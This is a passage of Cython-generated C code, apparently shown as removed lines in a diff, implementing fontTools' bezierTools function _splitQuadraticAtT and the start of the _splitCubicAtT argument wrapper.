__Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_4); - index = 0; __pyx_t_2 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_2)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_2); - index = 1; __pyx_t_1 = __pyx_t_5(__pyx_t_4); if (unlikely(!__pyx_t_1)) goto __pyx_L7_unpacking_failed; - __Pyx_GOTREF(__pyx_t_1); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_4), 2) < 0) __PYX_ERR(0, 708, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - goto __pyx_L8_unpacking_done; - __pyx_L7_unpacking_failed:; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 708, __pyx_L1_error) - __pyx_L8_unpacking_done:; - } - __pyx_v_cx = __pyx_t_2; - __pyx_t_2 = 0; - __pyx_v_cy = __pyx_t_1; - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":709 - * bx, by = b - * cx, cy = c - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - __pyx_t_6 = PyObject_Length(__pyx_v_ts); if (unlikely(__pyx_t_6 == ((Py_ssize_t)-1))) __PYX_ERR(0, 709, __pyx_L1_error) - __pyx_t_1 = PyInt_FromSsize_t((__pyx_t_6 - 1)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 709, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyObject_CallOneArg(__pyx_builtin_range, __pyx_t_1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 709, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (likely(PyList_CheckExact(__pyx_t_2)) || PyTuple_CheckExact(__pyx_t_2)) { - __pyx_t_1 = __pyx_t_2; __Pyx_INCREF(__pyx_t_1); - __pyx_t_6 = 0; - __pyx_t_7 = NULL; - } else { - __pyx_t_6 = -1; __pyx_t_1 = PyObject_GetIter(__pyx_t_2); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 709, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_7 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_1); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 709, __pyx_L1_error) - } - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - for (;;) { - if (likely(!__pyx_t_7)) { - if (likely(PyList_CheckExact(__pyx_t_1))) { - { - Py_ssize_t __pyx_temp = __Pyx_PyList_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 709, __pyx_L1_error) - #endif - if (__pyx_t_6 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_2 = PyList_GET_ITEM(__pyx_t_1, __pyx_t_6); __Pyx_INCREF(__pyx_t_2); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(0, 709, __pyx_L1_error) - #else - __pyx_t_2 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 709, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } else { - { - Py_ssize_t __pyx_temp = __Pyx_PyTuple_GET_SIZE(__pyx_t_1); - #if !CYTHON_ASSUME_SAFE_MACROS - if (unlikely((__pyx_temp < 0))) __PYX_ERR(0, 709, __pyx_L1_error) - #endif - if (__pyx_t_6 >= __pyx_temp) break; - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - __pyx_t_2 = PyTuple_GET_ITEM(__pyx_t_1, __pyx_t_6); __Pyx_INCREF(__pyx_t_2); __pyx_t_6++; if (unlikely((0 < 0))) __PYX_ERR(0, 709, __pyx_L1_error) - #else - __pyx_t_2 = __Pyx_PySequence_ITEM(__pyx_t_1, __pyx_t_6); __pyx_t_6++; if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 709, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - #endif - } - } else { - __pyx_t_2 = __pyx_t_7(__pyx_t_1); - if (unlikely(!__pyx_t_2)) { - PyObject* exc_type = PyErr_Occurred(); - if (exc_type) { - if (likely(__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) PyErr_Clear(); - else __PYX_ERR(0, 709, __pyx_L1_error) - } - break; - } - __Pyx_GOTREF(__pyx_t_2); - } - __Pyx_XDECREF_SET(__pyx_v_i, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":710 - * cx, cy = c - * for i in range(len(ts) - 1): - * t1 = ts[i] # <<<<<<<<<<<<<< - * t2 = ts[i + 1] - * delta = t2 - t1 - */ - __pyx_t_2 = __Pyx_PyObject_GetItem(__pyx_v_ts, __pyx_v_i); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 710, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_XDECREF_SET(__pyx_v_t1, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":711 - * for i in range(len(ts) - 1): - * t1 = ts[i] - * t2 = ts[i + 1] # <<<<<<<<<<<<<< - * delta = t2 - t1 - * # calc new a, b and c - */ - __pyx_t_2 = __Pyx_PyInt_AddObjC(__pyx_v_i, __pyx_int_1, 1, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 711, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_4 = __Pyx_PyObject_GetItem(__pyx_v_ts, __pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 711, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_XDECREF_SET(__pyx_v_t2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":712 - * t1 = ts[i] - * t2 = ts[i + 1] - * delta = t2 - t1 # <<<<<<<<<<<<<< - * # calc new a, b and c - * delta_2 = delta * delta - */ - __pyx_t_4 = PyNumber_Subtract(__pyx_v_t2, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 712, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_delta, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":714 - * delta = t2 - t1 - * # calc new a, b and c - * delta_2 = delta * delta # <<<<<<<<<<<<<< - * a1x = ax * delta_2 - * a1y = ay * delta_2 - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_delta, __pyx_v_delta); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 714, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_delta_2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":715 - * # calc new a, b and c - * delta_2 = delta * delta - * a1x = ax * delta_2 # <<<<<<<<<<<<<< - * a1y = ay * delta_2 - * b1x = (2 * ax * t1 + bx) * delta - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ax, __pyx_v_delta_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 715, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_a1x, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":716 - * delta_2 = delta * delta - * a1x = ax * delta_2 - * a1y = ay * delta_2 # <<<<<<<<<<<<<< - * b1x = (2 * ax * t1 + bx) * delta - * b1y = (2 * ay * t1 + by) * delta - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ay, __pyx_v_delta_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 716, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_a1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":717 - * a1x = ax * delta_2 - * a1y = ay * delta_2 - * b1x = (2 * ax * t1 + bx) * delta # <<<<<<<<<<<<<< - * b1y = (2 * ay * t1 + by) * delta - * t1_2 = t1 * t1 - */ - __pyx_t_4 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_v_ax, 2, 0, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 717, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_2 = PyNumber_Multiply(__pyx_t_4, __pyx_v_t1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 717, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Add(__pyx_t_2, __pyx_v_bx); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 717, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Multiply(__pyx_t_4, __pyx_v_delta); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 717, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_XDECREF_SET(__pyx_v_b1x, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":718 - * a1y = ay * delta_2 - * b1x = (2 * ax * t1 + bx) * delta - * b1y = (2 * ay * t1 + by) * delta # <<<<<<<<<<<<<< - * t1_2 = t1 * t1 - * c1x = ax * t1_2 + bx * t1 + cx - */ - __pyx_t_2 = __Pyx_PyInt_MultiplyCObj(__pyx_int_2, __pyx_v_ay, 2, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 718, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_4 = PyNumber_Multiply(__pyx_t_2, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 718, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_4, __pyx_v_by); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 718, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_4 = PyNumber_Multiply(__pyx_t_2, __pyx_v_delta); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 718, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_XDECREF_SET(__pyx_v_b1y, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":719 - * b1x = (2 * ax * t1 + bx) * delta - * b1y = (2 * ay * t1 + by) * delta - * t1_2 = t1 * t1 # <<<<<<<<<<<<<< - * c1x = ax * t1_2 + bx * t1 + cx - * c1y = ay * t1_2 + by * t1 + cy - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_t1, __pyx_v_t1); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 719, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_XDECREF_SET(__pyx_v_t1_2, __pyx_t_4); - __pyx_t_4 = 0; - - /* "fontTools/misc/bezierTools.py":720 - * b1y = (2 * ay * t1 + by) * delta - * t1_2 = t1 * t1 - * c1x = ax * t1_2 + bx * t1 + cx # <<<<<<<<<<<<<< - * c1y = ay * t1_2 + by * t1 + cy - * - */ - __pyx_t_4 = PyNumber_Multiply(__pyx_v_ax, __pyx_v_t1_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 720, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_2 = PyNumber_Multiply(__pyx_v_bx, __pyx_v_t1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 720, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_8 = PyNumber_Add(__pyx_t_4, __pyx_t_2); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 720, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Add(__pyx_t_8, __pyx_v_cx); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 720, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __Pyx_XDECREF_SET(__pyx_v_c1x, __pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":721 - * t1_2 = t1 * t1 - * c1x = ax * t1_2 + bx * t1 + cx - * c1y = ay * t1_2 + by * t1 + cy # <<<<<<<<<<<<<< - * - * pt1, pt2, pt3 = calcQuadraticPoints((a1x, a1y), (b1x, b1y), (c1x, c1y)) - */ - __pyx_t_2 = PyNumber_Multiply(__pyx_v_ay, __pyx_v_t1_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 721, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_8 = PyNumber_Multiply(__pyx_v_by, __pyx_v_t1); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 721, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __pyx_t_4 = PyNumber_Add(__pyx_t_2, __pyx_t_8); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 721, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_8 = PyNumber_Add(__pyx_t_4, __pyx_v_cy); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 721, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_XDECREF_SET(__pyx_v_c1y, __pyx_t_8); - __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":723 - * c1y = ay * t1_2 + by * t1 + cy - * - * pt1, pt2, pt3 = calcQuadraticPoints((a1x, a1y), (b1x, b1y), (c1x, c1y)) # <<<<<<<<<<<<<< - * segments.append((pt1, pt2, pt3)) - * return segments - */ - __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_calcQuadraticPoints); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_2 = PyTuple_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_INCREF(__pyx_v_a1x); - __Pyx_GIVEREF(__pyx_v_a1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 0, __pyx_v_a1x)) __PYX_ERR(0, 723, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_a1y); - __Pyx_GIVEREF(__pyx_v_a1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_2, 1, __pyx_v_a1y)) __PYX_ERR(0, 723, __pyx_L1_error); - __pyx_t_9 = PyTuple_New(2); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - __Pyx_INCREF(__pyx_v_b1x); - __Pyx_GIVEREF(__pyx_v_b1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_9, 0, __pyx_v_b1x)) __PYX_ERR(0, 723, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_b1y); - __Pyx_GIVEREF(__pyx_v_b1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_9, 1, __pyx_v_b1y)) __PYX_ERR(0, 723, __pyx_L1_error); - __pyx_t_10 = PyTuple_New(2); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __Pyx_INCREF(__pyx_v_c1x); - __Pyx_GIVEREF(__pyx_v_c1x); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_10, 0, __pyx_v_c1x)) __PYX_ERR(0, 723, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_c1y); - __Pyx_GIVEREF(__pyx_v_c1y); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_10, 1, __pyx_v_c1y)) __PYX_ERR(0, 723, __pyx_L1_error); - __pyx_t_11 = NULL; - __pyx_t_12 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_4))) { - __pyx_t_11 = PyMethod_GET_SELF(__pyx_t_4); - if (likely(__pyx_t_11)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_4); - __Pyx_INCREF(__pyx_t_11); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_4, function); - __pyx_t_12 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_11, __pyx_t_2, __pyx_t_9, __pyx_t_10}; - __pyx_t_8 = __Pyx_PyObject_FastCall(__pyx_t_4, __pyx_callargs+1-__pyx_t_12, 3+__pyx_t_12); - __Pyx_XDECREF(__pyx_t_11); __pyx_t_11 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_9); __pyx_t_9 = 0; - __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; - if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - } - if ((likely(PyTuple_CheckExact(__pyx_t_8))) || (PyList_CheckExact(__pyx_t_8))) { - PyObject* sequence = __pyx_t_8; - Py_ssize_t size = __Pyx_PySequence_SIZE(sequence); - if (unlikely(size != 3)) { - if (size > 3) __Pyx_RaiseTooManyValuesError(3); - else if (size >= 0) __Pyx_RaiseNeedMoreValuesError(size); - __PYX_ERR(0, 723, __pyx_L1_error) - } - #if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - if (likely(PyTuple_CheckExact(sequence))) { - __pyx_t_4 = PyTuple_GET_ITEM(sequence, 0); - __pyx_t_10 = PyTuple_GET_ITEM(sequence, 1); - __pyx_t_9 = PyTuple_GET_ITEM(sequence, 2); - } else { - __pyx_t_4 = PyList_GET_ITEM(sequence, 0); - __pyx_t_10 = PyList_GET_ITEM(sequence, 1); - __pyx_t_9 = PyList_GET_ITEM(sequence, 2); - } - __Pyx_INCREF(__pyx_t_4); - __Pyx_INCREF(__pyx_t_10); - __Pyx_INCREF(__pyx_t_9); - #else - __pyx_t_4 = PySequence_ITEM(sequence, 0); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_10 = PySequence_ITEM(sequence, 1); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_10); - __pyx_t_9 = PySequence_ITEM(sequence, 2); if (unlikely(!__pyx_t_9)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_9); - #endif - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - } else { - Py_ssize_t index = -1; - __pyx_t_2 = PyObject_GetIter(__pyx_t_8); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 723, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - __pyx_t_5 = __Pyx_PyObject_GetIterNextFunc(__pyx_t_2); - index = 0; __pyx_t_4 = __pyx_t_5(__pyx_t_2); if (unlikely(!__pyx_t_4)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_4); - index = 1; __pyx_t_10 = __pyx_t_5(__pyx_t_2); if (unlikely(!__pyx_t_10)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_10); - index = 2; __pyx_t_9 = __pyx_t_5(__pyx_t_2); if (unlikely(!__pyx_t_9)) goto __pyx_L11_unpacking_failed; - __Pyx_GOTREF(__pyx_t_9); - if (__Pyx_IternextUnpackEndCheck(__pyx_t_5(__pyx_t_2), 3) < 0) __PYX_ERR(0, 723, __pyx_L1_error) - __pyx_t_5 = NULL; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - goto __pyx_L12_unpacking_done; - __pyx_L11_unpacking_failed:; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_5 = NULL; - if (__Pyx_IterFinish() == 0) __Pyx_RaiseNeedMoreValuesError(index); - __PYX_ERR(0, 723, __pyx_L1_error) - __pyx_L12_unpacking_done:; - } - __Pyx_XDECREF_SET(__pyx_v_pt1, __pyx_t_4); - __pyx_t_4 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt2, __pyx_t_10); - __pyx_t_10 = 0; - __Pyx_XDECREF_SET(__pyx_v_pt3, __pyx_t_9); - __pyx_t_9 = 0; - - /* "fontTools/misc/bezierTools.py":724 - * - * pt1, pt2, pt3 = calcQuadraticPoints((a1x, a1y), (b1x, b1y), (c1x, c1y)) - * segments.append((pt1, pt2, pt3)) # <<<<<<<<<<<<<< - * return segments - * - */ - __pyx_t_8 = PyTuple_New(3); if (unlikely(!__pyx_t_8)) __PYX_ERR(0, 724, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_8); - __Pyx_INCREF(__pyx_v_pt1); - __Pyx_GIVEREF(__pyx_v_pt1); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_8, 0, __pyx_v_pt1)) __PYX_ERR(0, 724, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt2); - __Pyx_GIVEREF(__pyx_v_pt2); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_8, 1, __pyx_v_pt2)) __PYX_ERR(0, 724, __pyx_L1_error); - __Pyx_INCREF(__pyx_v_pt3); - __Pyx_GIVEREF(__pyx_v_pt3); - if (__Pyx_PyTuple_SET_ITEM(__pyx_t_8, 2, __pyx_v_pt3)) __PYX_ERR(0, 724, __pyx_L1_error); - __pyx_t_3 = __Pyx_PyList_Append(__pyx_v_segments, __pyx_t_8); if (unlikely(__pyx_t_3 == ((int)-1))) __PYX_ERR(0, 724, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; - - /* "fontTools/misc/bezierTools.py":709 - * bx, by = b - * cx, cy = c - * for i in range(len(ts) - 1): # <<<<<<<<<<<<<< - * t1 = ts[i] - * t2 = ts[i + 1] - */ - } - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":725 - * pt1, pt2, pt3 = calcQuadraticPoints((a1x, a1y), (b1x, b1y), (c1x, c1y)) - * segments.append((pt1, pt2, pt3)) - * return segments # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_segments); - __pyx_r = __pyx_v_segments; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":701 - * - * - * def _splitQuadraticAtT(a, b, c, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * segments = [] - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - __Pyx_XDECREF(__pyx_t_10); - __Pyx_XDECREF(__pyx_t_11); - __Pyx_AddTraceback("fontTools.misc.bezierTools._splitQuadraticAtT", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_ts); - __Pyx_XDECREF(__pyx_v_segments); - __Pyx_XDECREF(__pyx_v_ax); - __Pyx_XDECREF(__pyx_v_ay); - __Pyx_XDECREF(__pyx_v_bx); - __Pyx_XDECREF(__pyx_v_by); - __Pyx_XDECREF(__pyx_v_cx); - __Pyx_XDECREF(__pyx_v_cy); - __Pyx_XDECREF(__pyx_v_i); - __Pyx_XDECREF(__pyx_v_t1); - __Pyx_XDECREF(__pyx_v_t2); - __Pyx_XDECREF(__pyx_v_delta); - __Pyx_XDECREF(__pyx_v_delta_2); - __Pyx_XDECREF(__pyx_v_a1x); - __Pyx_XDECREF(__pyx_v_a1y); - __Pyx_XDECREF(__pyx_v_b1x); - __Pyx_XDECREF(__pyx_v_b1y); - __Pyx_XDECREF(__pyx_v_t1_2); - __Pyx_XDECREF(__pyx_v_c1x); - __Pyx_XDECREF(__pyx_v_c1y); - __Pyx_XDECREF(__pyx_v_pt1); - __Pyx_XDECREF(__pyx_v_pt2); - __Pyx_XDECREF(__pyx_v_pt3); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":728 - * - * - * def _splitCubicAtT(a, b, c, d, *ts): # <<<<<<<<<<<<<< - * ts = list(ts) - * ts.insert(0, 0.0) - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_42_splitCubicAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_41_splitCubicAtT, "_splitCubicAtT(a, b, c, d, *ts)"); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_42_splitCubicAtT = {"_splitCubicAtT", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_42_splitCubicAtT, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_41_splitCubicAtT}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_42_splitCubicAtT(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_d = 0; - PyObject *__pyx_v_ts = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("_splitCubicAtT (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - __pyx_v_ts = __Pyx_ArgsSlice_FASTCALL(__pyx_args, 4, __pyx_nargs); - if (unlikely(!__pyx_v_ts)) { - __Pyx_RefNannyFinishContext(); - return NULL; - } - __Pyx_GOTREF(__pyx_v_ts); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,&__pyx_n_s_d,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - default: - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 728, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - 